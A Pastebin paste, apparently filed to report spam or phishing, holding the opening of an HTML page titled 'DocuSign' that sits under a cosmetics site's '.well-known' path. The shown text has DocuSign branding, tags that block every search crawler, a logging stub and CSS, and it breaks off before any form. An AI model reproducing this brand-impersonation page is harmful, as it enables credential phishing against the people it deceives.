Advertisement
spamreports

http://kraumetikcosmetic.com/.well-known/docu/docu/doc/8383

Dec 18th, 2019
161
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 184.83 KB | None | 0 0
  1. <!DOCTYPE html >
  2.  
  3. <html lang="en">
  4. <head>
  5.     <script type="text/javascript">
  6.         (function(global) {
  7.             var times = {};
  8.             //------------------------------------
  9.             function LogTiming(action, startTime, endTime) {
  10.                 try {
  11.                     var loggingOn = false;
  12.                     if (!loggingOn) {
  13.                         return;
  14.                     }
  15.                     var params = "&action=" + action;
  16.                     //var pageName = "DocuSign.aspx";
  17.                     var url = "DocuSignXML.aspx?logtiming=1" + GetTI(false);
  18.  
  19.                     if (startTime && endTime) {
  20.                        params += "&starttime=" + startTime + "&endtime=" + endTime;
  21.                     } else if (window.res_ServerTimeForLogging) {
  22.                         // If no times specified assume we're using sever to generate start and end times
  23.                         params += "&serverstarttime=" + global.EscapeAll(res_ServerTimeForLogging);
  24.                     }
  25.  
  26.                     var xLogTiming = new global.XmlLoader(url);
  27.                     xLogTiming.sendPost("application/x-www-form-urlencoded", "requestPage=" + global.EscapeAll(pageName) + params);
  28.                 } catch (err) {
  29.                     // Make sure logging doesn't break anything
  30.                 }
  31.             }
  32.             //------------------------------------
  33.             function now() {
  34.                 return +(new Date());
  35.             }
  36.             //------------------------------------
  37.             function recordTime(timeLabel) {
  38.                 try {
  39.                     times[timeLabel] = now();
  40.                 } catch (err) {}
  41.             }
  42.             //------------------------------------
  43.             // logDiff looks up startTimeLabel (created by recordTime) which is an accessor to the times object.
  44.             // if no time is found in the times object matching startTimeLabel or startTimeLabel is undefined
  45.             // LogTime will use the server start time res_ServerTimeForLogging and serverEndTime when posted.
  46.             // If endTimeLabel is undefined then we assume now() for endTime
  47.             // Usage:
  48.             //    a point in your JS code do:
  49.             //      timeInfo.recordTime("anystartlabel")
  50.             //    end point of the JS code you want to track
  51.             //      timeInfo.recordTime("anyendlabel")
  52.             //    then call logDiff to post to server
  53.             //      timeInfo.logDiff("AnyAction", "anystartlabel", "anyendlabel");
  54.             function logDiff(action, startTimeLabel, endTimeLabel) {
  55.                 try {
  56.                     var endTime;
  57.                     if (startTimeLabel != null) {
  58.                         if (endTimeLabel == null) endTime = now();
  59.                         else endTime = times[endTimeLabel];
  60.                     }
  61.                     LogTiming(action, times[startTimeLabel], endTime);
  62.                 } catch (err) {
  63.                     // Make sure logging doesn't break anything
  64.                 }
  65.             }
  66.             //------------------------------------
  67.             var timeInfo = {
  68.                 recordTime: recordTime,
  69.                 logDiff: logDiff
  70.             }
  71.             //------------------------------------
  72.             global.timeInfo = timeInfo;
  73.         })(this);
  74.         timeInfo.recordTime("JsExecStarted");
  75.     </script>
  76.  
  77.  
  78.     <meta name="robots" content="noindex, noarchive, nofollow, nosnippet" />
  79.     <meta name="googlebot" content="noindex, noarchive, nofollow, nosnippet, noimageindex" />
  80.     <meta name="slurp" content="noindex, noarchive, nofollow, nosnippet, noodp, noydir" />
  81.     <meta name="msnbot" content="noindex, noarchive, nofollow, nosnippet" />
  82.     <meta name="teoma" content="noindex, noarchive, nofollow, nosnippet" />
  83.     <title>
  84.         DocuSign
  85.     </title>
  86.     <link href="https://www.docusign.com/favicon.ico" rel="shortcut icon" type="image/x-icon" />
  87.     <meta content="JavaScript" name="vs_defaultClientScript" />
  88.     <meta content="C#" name="CODE_LANGUAGE" />
  89.     <meta name="viewport" content="initial-scale=1.0" />
  90.     <link id="ds_dsCss_styMartiniFonts" rel="stylesheet" href="//docucdn-a.akamaihd.net/signing/1.9.0/css/font-faces.css" type="text/css"></link>
  91.  
  92.     <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/css/bootstrap.min.css" integrity="sha384-9gVQ4dYFwwWSjIDZnLEWnxCjeSWFphJiwGPXr1jddIhOegiu1FwO5qRGvFXOdJZ4" crossorigin="anonymous">
  93.  
  94.  
  95.  
  96.     <style id="ds_dsCss_styHolder" type="text/css">
  97.         body {
  98.             margin: 0px;
  99.             font-family: Helvetica, Arial, sans-serif !important;
  100.             font-size: 12px;
  101.             color: #333333;
  102.             background-color: none;
  103.             background-image: url(img/body_background.png);
  104.             background-repeat: repeat;
  105.         }
  106.  
  107.         input {
  108.             font-family: Helvetica, Arial, sans-serif !important;
  109.             font-size: 12px;
  110.         }
  111.  
  112.         select {
  113.             font-family: Helvetica, Arial, sans-serif !important;
  114.             font-size: 12px;
  115.         }
  116.  
  117.         textarea {
  118.             font-family: Helvetica, Arial, sans-serif !important;
  119.             font-size: 13px;
  120.         }
  121.  
  122.         button {
  123.             font-family: Helvetica, Arial, sans-serif !important;
  124.             font-size: 13px;
  125.         }
  126.  
  127.         a {
  128.             font-family: Helvetica, Arial, sans-serif !important;
  129.             color: #0D61AF;
  130.             cursor: pointer;
  131.             text-decoration: none;
  132.             font-size: 13px;
  133.         }
  134.  
  135.         a:hover {
  136.             text-decoration: underline;
  137.         }
  138.  
  139.         a.smaller {
  140.             font-size: 11px;
  141.         }
  142.  
  143.         .SubjectHeaderTxt {
  144.             color: #999;
  145.         }
  146.  
  147.         .BtnHighlight {
  148.             width: 1px;
  149.             position: absolute;
  150.             background-color: #fff;
  151.             top: 0px;
  152.             height: 32px;
  153.         }
  154.  
  155.         .Btnyellow_new {
  156.             position: relative;
  157.             cursor: pointer;
  158.             text-decoration: none;
  159.             white-space: nowrap;
  160.             background-repeat: repeat-x;
  161.             padding: 1px 15px;
  162.             font-family: Helvetica, Arial, sans-serif !important;
  163.             text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.5);
  164.             background-image: url(img/button_gradient.png);
  165.             -moz-border-radius: 2px;
  166.             -webkit-border-radius: 2px;
  167.             border-radius: 2px;
  168.             border: solid 1px #e7b236;
  169.             ;
  170.             font-size: 12px;
  171.             font-weight: bold;
  172.             min-height: 34px;
  173.             background-color: #ffcc4a;
  174.             color: #333333 !important;
  175.         }
  176.  
  177.         .Btngray_reskin {
  178.             border: solid 1px #cccccc;
  179.             border-radius: 2px;
  180.             -webkit-border-radius: 2px;
  181.             -moz-border-radius: 2px;
  182.             box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15), inset 1px 1px 1px 1px rgba(255, 255, 255, 0.5);
  183.             -webkit-box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15), inset 1px 1px 1px 1px rgba(255, 255, 255, 0.5);
  184.             -moz-box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15), inset 1px 1px 1px 1px rgba(255, 255, 255, 0.5);
  185.             background-image: url(img/button_gradient.png);
  186.             background-repeat: repeat-x;
  187.             font-size: 13px;
  188.             margin: 2px;
  189.             text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.5);
  190.             border: solid 1px #C6C6C6;
  191.             background-color: #e2e2e2;
  192.             color: #666666;
  193.         }
  194.  
  195.         .Btngray_reskin:hover,
  196.         .SigningHeaderButton:hover {
  197.             background-image: url(img/button_gradient_34_hover.png);
  198.         }
  199.  
  200.         .Btngray_reskin:active,
  201.         .HeaderBtnyellow_new:active,
  202.         .SigningHeaderButton:active {
  203.             background-image: url(img/button_gradient_34_press.png);
  204.         }
  205.  
  206.         .SigningHeaderButton {
  207.             text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.5);
  208.             border: solid 1px #C6C6C6;
  209.             background-color: #e2e2e2;
  210.             color: #666666;
  211.         }
  212.  
  213.         .Btngray_home {
  214.             border: solid 1px #cccccc;
  215.             border-radius: 2px;
  216.             -webkit-border-radius: 2px;
  217.             -moz-border-radius: 2px;
  218.             box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15);
  219.             -webkit-box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15);
  220.             -moz-box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15);
  221.             background-color: #DCDCDC;
  222.             background-image: url(img/button_gradient_40.png);
  223.             background-repeat: repeat-x;
  224.             font-size: 16px;
  225.             color: #333333;
  226.             position: relative;
  227.             height: 40px;
  228.             cursor: pointer;
  229.         }
  230.  
  231.         .Btngray_home:hover {
  232.             background-image: url(img/button_gradient_40_hover.png);
  233.         }
  234.  
  235.         .Btngray_home:active {
  236.             background-image: url(img/button_gradient_40_press.png);
  237.         }
  238.  
  239.         .Btnyellow_reskin {
  240.             background-image: url(img/button_autonav_gradient_40.png);
  241.             background-color: #FFCC4A;
  242.             background-repeat: repeat-x;
  243.             border: 1px solid #e7b236;
  244.             border-radius: 2px;
  245.             -webkit-border-radius: 2px;
  246.             -moz-border-radius: 2px;
  247.             cursor: pointer;
  248.             position: relative;
  249.             text-decoration: none;
  250.             font-weight: bold;
  251.             width: 101px !important;
  252.             height: 42px !important;
  253.             text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.5);
  254.             color: #333333;
  255.         }
  256.  
  257.         .Btnyellow_reskin_hover {
  258.             background-image: url(img/button_autonav_gradient_40_on.png);
  259.         }
  260.  
  261.         .Btnyellow_login {
  262.             font-family: 'Maven Pro', Arial, sans-serif !important;
  263.             font-weight: bold;
  264.             font-size: 13px;
  265.             letter-spacing: .6px;
  266.             background-color: #ffc820;
  267.             background-repeat: repeat-x;
  268.             border: 1px solid transparent;
  269.             border-radius: 2px;
  270.             -webkit-border-radius: 2px;
  271.             -moz-border-radius: 2px;
  272.             cursor: pointer;
  273.             position: relative;
  274.             white-space: nowrap;
  275.             text-decoration: none;
  276.             margin: 0 !important;
  277.             height: 34px !important;
  278.             text-transform: uppercase;
  279.             color: #333;
  280.             padding: 0 18px;
  281.             line-height: 30px;
  282.             min-width: 0 !important;
  283.         }
  284.  
  285.         .Btnyellow_login .BtnHighlight {
  286.             display: none;
  287.         }
  288.  
  289.         .Btnyellow_login_hover,
  290.         .Btnyellow_login:hover {
  291.             background-color: #f7ba00;
  292.         }
  293.  
  294.         .Btnyellow_login:active {
  295.             background-color: #eaa602;
  296.         }
  297.  
  298.         .Btngray_login {
  299.             font-family: 'Maven Pro', Arial, sans-serif !important;
  300.             font-weight: bold;
  301.             font-size: 13px;
  302.             letter-spacing: .6px;
  303.             background-color: #e9e9e9;
  304.             background-repeat: repeat-x;
  305.             border: 1px solid transparent;
  306.             border-radius: 2px;
  307.             -webkit-border-radius: 2px;
  308.             -moz-border-radius: 2px;
  309.             cursor: pointer;
  310.             position: relative;
  311.             white-space: nowrap;
  312.             text-decoration: none;
  313.             margin: 0 !important;
  314.             height: 34px !important;
  315.             text-transform: uppercase;
  316.             color: #333;
  317.             padding: 0 18px;
  318.             line-height: 30px;
  319.             min-width: 0 !important;
  320.         }
  321.  
  322.         .Btngray_login .BtnHighlight {
  323.             display: none;
  324.         }
  325.  
  326.         .Btngray_login_hover,
  327.         .Btngray_login:hover {
  328.             background-color: #dcdcdc;
  329.         }
  330.  
  331.         .Btngray_login:active {
  332.             background-color: #dcdcdc;
  333.         }
  334.  
  335.         .Btnyellow_home {
  336.             background-image: url(img/button_autonav_gradient_40.png);
  337.             background-repeat: repeat-x;
  338.             border: 1px solid #e7b236;
  339.             border-radius: 2px;
  340.             box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15);
  341.             -webkit-box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15);
  342.             -moz-box-shadow: 0px 1px 3px 0px rgba(0, 0, 0, .15);
  343.             -webkit-border-radius: 2px;
  344.             -moz-border-radius: 2px;
  345.             cursor: pointer;
  346.             position: relative;
  347.             font-size: 16px;
  348.             text-decoration: none;
  349.             width: 91px !important;
  350.             height: 40px !important;
  351.             text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.5);
  352.             color: #333333;
  353.             cursor: pointer;
  354.         }
  355.  
  356.         .Btnyellow_home:active {
  357.             background-image: url(img/button_autonav_gradient_40_on.png);
  358.         }
  359.  
  360.         .BtnHighlight40 {
  361.             height: 40px !important;
  362.             opacity: 0.2;
  363.         }
  364.  
  365.         .Btnprimary {
  366.             position: relative;
  367.             cursor: pointer;
  368.             text-decoration: none;
  369.             white-space: nowrap;
  370.             background-repeat: repeat-x;
  371.             padding: 1px 15px;
  372.             font-family: Helvetica, Arial, sans-serif !important;
  373.             text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.5);
  374.             background-image: url(img/button_gradient.png);
  375.             -moz-border-radius: 2px;
  376.             -webkit-border-radius: 2px;
  377.             border-radius: 2px;
  378.             border: solid 1px #C6C6C6;
  379.             font-size: 12px;
  380.             font-weight: bold;
  381.             min-height: 34px;
  382.             background-color: #e2e2e2;
  383.             color: #0D61AF;
  384.         }
  385.  
  386.         .Btnprimary:hover {
  387.             background-image: url(img/button_gradient_hover.png);
  388.         }
  389.  
  390.         .Btnprimary:disabled {
  391.             color: #bbbbbb;
  392.         }
  393.  
  394.         .Btnsecondary {
  395.             position: relative;
  396.             cursor: pointer;
  397.             text-decoration: none;
  398.             white-space: nowrap;
  399.             background-repeat: repeat-x;
  400.             padding: 1px 15px;
  401.             font-family: Helvetica, Arial, sans-serif !important;
  402.             text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.5);
  403.             background-image: url(img/button_gradient.png);
  404.             -moz-border-radius: 2px;
  405.             -webkit-border-radius: 2px;
  406.             border-radius: 2px;
  407.             border: solid 1px #C6C6C6;
  408.             font-size: 12px;
  409.             font-weight: bold;
  410.             min-height: 34px;
  411.             background-color: #e2e2e2;
  412.             color: #666666;
  413.         }
  414.  
  415.         .Btnsecondary:hover {
  416.             background-image: url(img/button_gradient_hover.png);
  417.         }
  418.  
  419.         .Btnsecondary:disabled {
  420.             color: #bbbbbb;
  421.         }
  422.  
  423.         .Btntransparent {
  424.             background-color: transparent;
  425.             border: solid 1px transparent;
  426.             cursor: pointer;
  427.             font-weight: normal;
  428.             position: relative;
  429.             text-decoration: none;
  430.             padding: 1px;
  431.             margin: 0px 10px;
  432.             font-size: 12px;
  433.             min-height: 36px;
  434.             border: solid 0px transparent;
  435.             color: #0D61AF;
  436.         }
  437.  
  438.         .DiaHCSignDialog,
  439.         .DiaHCSignDialogSmall {
  440.             position: absolute;
  441.             top: 20px;
  442.             right: 16px;
  443.             padding: 5px 5px 0px 0px;
  444.         }
  445.  
  446.         .Btntransparent:hover {
  447.             text-decoration: underline;
  448.         }
  449.  
  450.         .Btntransparent:disabled {
  451.             color: #A0A0A0;
  452.         }
  453.  
  454.         .Modal {
  455.             position: absolute;
  456.             z-index: 12;
  457.             top: 0px;
  458.             height: 500px;
  459.             -ms-filter: 'progid:DXImageTransform.Microsoft.Alpha(Opacity=60)';
  460.             filter: Alpha(opacity=60);
  461.             opacity: .6;
  462.             background-color: transparent !important;
  463.             background-color: #FFFFFF;
  464.             background-image: url(img/masknew.png) !important;
  465.             background-image: none;
  466.             background-repeat: repeat;
  467.             left: 0px;
  468.             width: 100%;
  469.         }
  470.  
  471.         .DiaHTSignDialog {
  472.             padding: 30px 35px 4px;
  473.         }
  474.  
  475.         .DashboardArea {
  476.             background: #fff;
  477.             border: solid 1px #ccc;
  478.             padding: 10px;
  479.             clear: both;
  480.             margin-top: 20px;
  481.         }
  482.  
  483.         .DashboardLinkBoldText {
  484.             font-weight: bold;
  485.             font-size: 12px;
  486.             color: #069;
  487.             cursor: pointer;
  488.         }
  489.  
  490.         .DashboardDisabledText {
  491.             font-weight: bold;
  492.             color: #9A9A9A;
  493.         }
  494.  
  495.         .DashboardLinkBoldText:hover {
  496.             text-decoration: underline;
  497.         }
  498.  
  499.         .DashboardLinkText {
  500.             font-weight: normal;
  501.             font-size: 12px;
  502.             color: #069;
  503.             cursor: pointer;
  504.         }
  505.  
  506.         .DashboardLinkText:hover {
  507.             text-decoration: underline;
  508.         }
  509.  
  510.         .DashboardLink11BoldText {
  511.             font-weight: bold;
  512.             font-size: 11px;
  513.             color: #069;
  514.             cursor: pointer;
  515.         }
  516.  
  517.         .DashboardLink11BoldText:hover {
  518.             text-decoration: underline;
  519.         }
  520.  
  521.         .DashboardIdName {
  522.             font-weight: normal;
  523.             font-size: 18px;
  524.             color: #000000;
  525.             font-family: Helvetica, Arial, sans-serif !important;
  526.         }
  527.  
  528.         .FieldLbl {
  529.             padding: 2px 5px 0px 13px !important;
  530.         }
  531.  
  532.         .Field {
  533.             color: #333333;
  534.             margin: 5px;
  535.             padding: 2px 9px;
  536.             resize: none;
  537.             background-color: #FAFAFA;
  538.             -moz-border-radius: 2px;
  539.             -webkit-border-radius: 2px;
  540.             border-radius: 2px;
  541.             border: solid 1px #CCC;
  542.         }
  543.  
  544.         .Field:focus {
  545.             outline: none;
  546.             border: solid 1px #333333;
  547.         }
  548.  
  549.         .Field:disabled {
  550.             color: #bbbbbb;
  551.             background-color: #efefef;
  552.             border: solid 1px #cccccc;
  553.         }
  554.  
  555.         select.Field {
  556.             padding: 1px 2px 1px 2px !important;
  557.             -moz-border-radius: 3px !important;
  558.             -webkit-border-radius: 3px !important;
  559.             border-radius: 3px !important;
  560.         }
  561.  
  562.         .FieldMissing {
  563.             color: #999999;
  564.         }
  565.  
  566.         .FieldNotMissing {
  567.             color: #333333;
  568.         }
  569.  
  570.         .FieldRequired {
  571.             color: #333333;
  572.             margin: 5px;
  573.             padding: 2px 9px;
  574.             resize: none;
  575.             background-color: #FAFAFA;
  576.             -moz-border-radius: 2px;
  577.             -webkit-border-radius: 2px;
  578.             border-radius: 2px;
  579.             border: solid 1px #CCC;
  580.         }
  581.  
  582.         .FieldNoEdit {
  583.             margin: 5px;
  584.             padding: 2px 9px;
  585.             resize: none;
  586.             -moz-border-radius: 2px;
  587.             -webkit-border-radius: 2px;
  588.             border-radius: 2px;
  589.             border: solid 1px #CCC;
  590.             border: solid 1px #CCC;
  591.             background-color: #ffffff;
  592.         }
  593.  
  594.         .FieldNoEdit:disabled {
  595.             color: #bbbbbb;
  596.             background-color: #efefef;
  597.             border: solid 1px #cccccc;
  598.         }
  599.  
  600.         .FieldNoEdit:hover {
  601.             color: #333333;
  602.             margin: 5px;
  603.             padding: 2px 9px;
  604.             resize: none;
  605.             background-color: #FAFAFA;
  606.             -moz-border-radius: 2px;
  607.             -webkit-border-radius: 2px;
  608.             border-radius: 2px;
  609.             border: solid 1px #CCC;
  610.         }
  611.  
  612.         .SigningGroupEmailDisabled:hover {
  613.             background-color: #efefef;
  614.         }
  615.  
  616.         .LogoutLinks {
  617.             position: absolute;
  618.             top: 0px;
  619.             right: 25px;
  620.             z-index: 1000;
  621.         }
  622.  
  623.         .TabsHolder {
  624.             position: relative;
  625.             z-index: 100;
  626.             min-height: 51px;
  627.             background-color: #1E4CA1;
  628.             background-image: url(img/header_noisegradient.png);
  629.             background-repeat: repeat-x;
  630.         }
  631.  
  632.         .TabsPointer {
  633.             position: absolute;
  634.             z-index: 101;
  635.             top: 42px;
  636.         }
  637.  
  638.         .Border {
  639.             position: relative;
  640.             min-width: 1024px;
  641.             border-bottom: solid 1px #cccccc;
  642.         }
  643.  
  644.         .Header {
  645.             position: relative;
  646.             background-color: transparent;
  647.             background-image: url(img/subheader_background.png);
  648.             background-repeat: repeat-x;
  649.             background-position: bottom;
  650.             min-height: 69px;
  651.         }
  652.  
  653.         .HeaderContent {
  654.             position: relative;
  655.             margin: 0px 10px 0px 10px;
  656.             float: left;
  657.         }
  658.  
  659.         .HeaderLink {
  660.             color: #0D61AF;
  661.             font-size: 12px;
  662.         }
  663.  
  664.         .Logo {
  665.             position: relative;
  666.             float: left;
  667.             vertical-align: middle;
  668.         }
  669.  
  670.         .LogoFrameL {
  671.             margin: 0px 0px 0px 40px;
  672.         }
  673.  
  674.         .LogoFrameR {
  675.             margin: 0px 40px 0px 0px;
  676.         }
  677.  
  678.         .LogoLeft {
  679.             margin: 0px;
  680.             cursor: pointer;
  681.             background-color: #ffffff;
  682.             background-image: url(img/header_logo_gradient.png);
  683.             background-repeat: repeat-x;
  684.             padding: 5px 0px;
  685.             height: 37px;
  686.         }
  687.  
  688.         .LogoRight {
  689.             position: relative;
  690.             margin: 5px 10px 2px 10px;
  691.             float: right;
  692.         }
  693.  
  694.         .FormBody {
  695.             min-height: 300px;
  696.             position: relative;
  697.             margin: 0px;
  698.             clear: both;
  699.         }
  700.  
  701.         .Footer {
  702.             min-width: 944px;
  703.             text-align: right;
  704.             padding: 0 40px;
  705.         }
  706.  
  707.         .FooterLogin {
  708.             position: absolute;
  709.             padding: 0px;
  710.             display: block;
  711.         }
  712.  
  713.         .FooterImage {
  714.             position: relative;
  715.             float: left;
  716.             margin-right: 20px;
  717.         }
  718.  
  719.         .DiaHSignDialogSmall {
  720.             overflow: visible;
  721.         }
  722.  
  723.         #divLanguageSelected {
  724.             *display: inline;
  725.         }
  726.  
  727.         .FooterLinks {
  728.             color: #999;
  729.             display: inline-block;
  730.             *display: inline;
  731.             overflow: visible;
  732.             position: relative;
  733.         }
  734.  
  735.         .FooterLink {
  736.             padding-top: 4px;
  737.             display: inline-block;
  738.             color: #999;
  739.             font-size: 12px;
  740.             cursor: pointer;
  741.         }
  742.  
  743.         .FooterLink:hover {
  744.             text-decoration: underline;
  745.         }
  746.  
  747.         .FooterLink.set-mobile {
  748.             padding-right: 15px;
  749.         }
  750.  
  751.         .FooterMenuClosed {
  752.             color: #999;
  753.             display: none;
  754.             z-index: 1000;
  755.             cursor: pointer;
  756.             min-width: 100px;
  757.         }
  758.  
  759.         .FooterMenuClosed:hover {
  760.             display: block;
  761.             left: 0px;
  762.             top: 0px;
  763.             z-index: 1000;
  764.             cursor: pointer;
  765.             min-width: 100px;
  766.             border: solid 1px #DEDEDE;
  767.             -moz-border-radius: 10px;
  768.             -webkit-border-radius: 10px;
  769.             border-radius: 10px;
  770.         }
  771.  
  772.         .SctClr {
  773.             position: relative;
  774.             clear: both;
  775.             height: 1px;
  776.             font-size: 1px;
  777.         }
  778.  
  779.         .DefaultLinkBlue {
  780.             color: #0D61AF;
  781.         }
  782.  
  783.         .DefaultLinkDark {
  784.             color: #000000;
  785.         }
  786.  
  787.         .DefaultLinkLight {
  788.             color: #FFFFFF;
  789.         }
  790.  
  791.         .DefaultLink12 {
  792.             font-size: 12px;
  793.         }
  794.  
  795.         .DefaultLink,
  796.         .DefaultLink:visited {
  797.             text-decoration: none;
  798.             cursor: pointer;
  799.         }
  800.  
  801.         .DefaultLink:hover {
  802.             text-decoration: underline;
  803.             cursor: pointer;
  804.         }
  805.  
  806.         .ToolSp {
  807.             position: relative;
  808.             height: 2px;
  809.             font-size: 2px;
  810.             background-image: url(img/options_spacer.png);
  811.             background-repeat: repeat-x;
  812.             margin-top: 3px;
  813.             margin-bottom: 3px;
  814.         }
  815.  
  816.         .ToolSpSmall {
  817.             position: relative;
  818.             height: 2px;
  819.             font-size: 2px;
  820.             background-image: url(img/options_spacer.png);
  821.             background-repeat: repeat-x;
  822.             margin-top: 1px;
  823.         }
  824.  
  825.         .SearchTxtImg {
  826.             position: absolute;
  827.             right: 0px;
  828.             cursor: pointer;
  829.             vertical-align: middle;
  830.             background-repeat: no-repeat;
  831.             top: 0px;
  832.             height: 32px;
  833.             width: 32px;
  834.             background-color: #e2e2e2;
  835.             background-image: url(img/search_new_dark.png);
  836.             -moz-border-radius: 0px 2px 2px 0px;
  837.             -webkit-border-radius: 0px 2px 2px 0px;
  838.             border-radius: 0px 2px 2px 0px;
  839.             border: solid 1px #C6C6C6;
  840.         }
  841.  
  842.         .SearchTxtImg:hover {
  843.             background-image: url(img/search_new_dark_hover.png);
  844.         }
  845.  
  846.         .SearchField {
  847.             padding: 2px 30px 2px 7px !important;
  848.             height: 28px;
  849.             width: 200px;
  850.             margin-top: 0px;
  851.             border: solid 1px #C6C6C6 !important;
  852.         }
  853.  
  854.         .DIA {
  855.             position: absolute;
  856.             z-index: 500;
  857.             min-width: 385px;
  858.         }
  859.  
  860.         .DIASCREEN {
  861.             position: fixed !important;
  862.             z-index: 500;
  863.         }
  864.  
  865.         .DIAFLOW {
  866.             position: relative;
  867.             margin: 0px 10px;
  868.             width: 1015px;
  869.         }
  870.  
  871.         .DIAFLOWLEFTONLY {
  872.             position: relative;
  873.             margin: 0px 10px;
  874.             width: 242px;
  875.         }
  876.  
  877.         .Correcting {
  878.             position: relative;
  879.             margin: 0px 10px;
  880.             width: 1015px;
  881.             font-size: 20px;
  882.             padding: 6px;
  883.         }
  884.  
  885.         .ErrorMessageText {
  886.             font-weight: bold;
  887.             font-size: 11px;
  888.             color: #DC143C;
  889.         }
  890.  
  891.         .ContentTextBoldBlue {
  892.             font-weight: bold;
  893.             font-size: 12px;
  894.             color: #0073cf;
  895.         }
  896.  
  897.         .ContentTextBlue {
  898.             font-weight: normal;
  899.             font-size: 12px;
  900.             color: #0073cf;
  901.         }
  902.  
  903.         .Page {
  904.             margin: 30px 0px 0px 55px;
  905.             position: relative;
  906.             background-color: #646464;
  907.             clear: both;
  908.             border: solid 1px #c4c4c4;
  909.             ;
  910.             -moz-box-shadow: 2px 2px 8px #646464;
  911.             -webkit-box-shadow: 2px 2px 8px #646464;
  912.             box-shadow: 2px 2px 8px #646464;
  913.         }
  914.  
  915.         .PageIdentifier {
  916.             margin: 0px 0px 0px 55px;
  917.             position: relative;
  918.             background-color: transparent;
  919.             padding-top: 6px;
  920.         }
  921.  
  922.         .CurrentFilter {
  923.             font-size: 12px;
  924.         }
  925.  
  926.         .BorderRoundGray {
  927.             padding: 5px;
  928.             -moz-border-radius: 5px;
  929.             -webkit-border-radius: 5px;
  930.             border-radius: 5px;
  931.             border: solid 1px #CFCFCF;
  932.         }
  933.  
  934.         .histEntityTitle {
  935.             color: #999999;
  936.             font-size: 14px;
  937.         }
  938.  
  939.         .histEntityContent {
  940.             color: #333333;
  941.             font-size: 14px;
  942.         }
  943.  
  944.         .historyDataRow {
  945.             margin-bottom: 4px;
  946.             font-size: 14px;
  947.             color: #333333;
  948.             border-bottom: solid 1px #e8e8e8;
  949.             float: left;
  950.             width: 100%;
  951.         }
  952.  
  953.         .timeColumn {
  954.             display: inline-block;
  955.             vertical-align: top;
  956.             width: 14%;
  957.             margin-right: 10px;
  958.             float: left;
  959.         }
  960.  
  961.         .userColumn {
  962.             display: inline-block;
  963.             vertical-align: top;
  964.             width: 20%;
  965.             margin-right: 10px;
  966.             float: left;
  967.         }
  968.  
  969.         .actionColumn {
  970.             display: inline-block;
  971.             vertical-align: top;
  972.             width: 12%;
  973.             margin-right: 10px;
  974.             float: left;
  975.         }
  976.  
  977.         .activityColumn {
  978.             display: inline-block;
  979.             vertical-align: top;
  980.             width: 37%;
  981.             margin-right: 10px;
  982.             float: left;
  983.         }
  984.  
  985.         .statusColumn {
  986.             display: inline-block;
  987.             vertical-align: top;
  988.             width: 8%;
  989.         }
  990.  
  991.         .TabCommon {
  992.             cursor: pointer;
  993.             float: left;
  994.             position: relative;
  995.             font-size: 14px;
  996.             text-align: center;
  997.             margin-left: 0px;
  998.             padding-left: 5px;
  999.             padding-right: 5px;
  1000.             border-left: solid 1px #143169;
  1001.             border-right: 1px solid transparent;
  1002.             bottom: 0px;
  1003.             color: #FFFFFF;
  1004.         }
  1005.  
  1006.         .TabSmall {
  1007.             font-weight: bold;
  1008.             border: 1px solid #C6C6C6 !important;
  1009.             font-size: 12px;
  1010.             min-width: 70px !important;
  1011.             min-height: 24px !important;
  1012.             padding-top: 9px;
  1013.             background-image: url(img/button_gradient.png);
  1014.             background-repeat: repeat-x;
  1015.             background-color: #e2e2e2;
  1016.             color: #666666;
  1017.         }
  1018.  
  1019.         .TabSelSmall {
  1020.             font-weight: bold;
  1021.             border: none !important;
  1022.             font-size: 12px;
  1023.             min-width: 72px !important;
  1024.             min-height: 25px !important;
  1025.             padding-top: 10px;
  1026.             background-color: #1E4CA1;
  1027.             color: #FFFFFF;
  1028.         }
  1029.  
  1030.         .TabBig {
  1031.             font-size: 13px;
  1032.             font-weight: bold;
  1033.             height: 29px !important;
  1034.             min-width: 100px !important;
  1035.             padding-top: 16px;
  1036.         }
  1037.  
  1038.         .TabSelBig {
  1039.             font-size: 13px;
  1040.             font-weight: bold;
  1041.             border-right: 1px solid transparent;
  1042.             border-bottom: solid 1px #143169;
  1043.             background-color: #143169;
  1044.             height: 29px !important;
  1045.             min-width: 100px !important;
  1046.             padding-top: 16px;
  1047.         }
  1048.  
  1049.         .TabOuter {
  1050.             border-right: solid 1px #143169;
  1051.             float: left;
  1052.             position: relative;
  1053.         }
  1054.  
  1055.         .TabOuterSmall {
  1056.             float: left;
  1057.             position: relative;
  1058.             -moz-border-radius: 2px;
  1059.             -webkit-border-radius: 2px;
  1060.             border-radius: 2px;
  1061.         }
  1062.  
  1063.         .TabSpace {
  1064.             float: left;
  1065.             height: 10px;
  1066.             position: relative;
  1067.             width: 280px;
  1068.         }
  1069.  
  1070.         .HeaderTextStyle {
  1071.             font-size: 13px;
  1072.             font-weight: bold;
  1073.             font-size: 13px;
  1074.             font-weight: bold;
  1075.             color: #FFFFFF;
  1076.         }
  1077.  
  1078.         .HeaderBackground {
  1079.             background-color: #1E4CA1;
  1080.         }
  1081.  
  1082.         .ActionsMenu {
  1083.             display: block;
  1084.             z-index: 1000;
  1085.             cursor: pointer;
  1086.             min-width: 100px;
  1087.             background-color: #FAFAFA;
  1088.             border: solid 1px #A4A4A4;
  1089.             -moz-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  1090.             -webkit-box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  1091.             box-shadow: 0px 0px 6px 0px rgba(0, 0, 0, 0.3);
  1092.             -moz-border-radius: 2px;
  1093.             -webkit-border-radius: 2px;
  1094.             border-radius: 2px;
  1095.             color: #333333;
  1096.         }
  1097.  
  1098.         .ActionsMenuManage {
  1099.             display: block;
  1100.             z-index: 1000;
  1101.             cursor: pointer;
  1102.             position: absolute;
